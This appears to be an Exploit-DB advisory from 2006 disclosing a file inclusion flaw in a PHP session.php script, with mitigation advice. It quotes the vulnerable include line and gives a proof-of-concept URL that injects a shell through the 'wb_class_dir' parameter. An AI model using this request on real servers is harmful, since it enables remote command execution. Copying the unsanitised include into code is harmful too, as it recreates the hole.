Arbitrary File Inclusion Vulnerability in session.php

vendor:

by:

O.U.T.L.A.W

7.5

CVSS

HIGH

Arbitrary File Inclusion

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2006

Arbitrary File Inclusion Vulnerability in session.php

The vulnerability allows an attacker to include arbitrary files from the server. By manipulating the 'wb_class_dir' parameter, an attacker can include a shell script and execute arbitrary commands on the server.

Mitigation:

Update the code to properly validate and sanitize user input when including files. Additionally, restrict file inclusion to only necessary directories.

Source

Exploit-DB raw data:

###########################################################################################
#                                   Aria-Security.net Advisory                            #
#                                 Discovered  by: O.U.T.L.A.W                             #
#                                < www.Aria-security.net >                                #
#                      Gr33t to: A.u.r.a  & l2odon & DrtRp & Sh3ll                        #              
###########################################################################################


<?php
include_once("$wb_class_dir/classDatabase.php");


function Start_Session()
{
    global $session_dir;

    if ( $session_dir != '' )
        session_save_path($session_dir);

    if ( ! isset($_SESSION) )
    {
        session_start();
        // Supposedly a fix for IE6
        header('Cache-control: private');
        My_Cache();

        if ( ! isset($_SESSION['db']) || gettype($_SESSION['db']->db) != 'resource')
            touchDatabaseSession();

    }
}


***********************************************************************

Proof of Concept:
server/includes/session.php?wb_class_dir=SHELL

Contact : Outlaw@aria-security.net

# milw0rm.com [2006-08-11]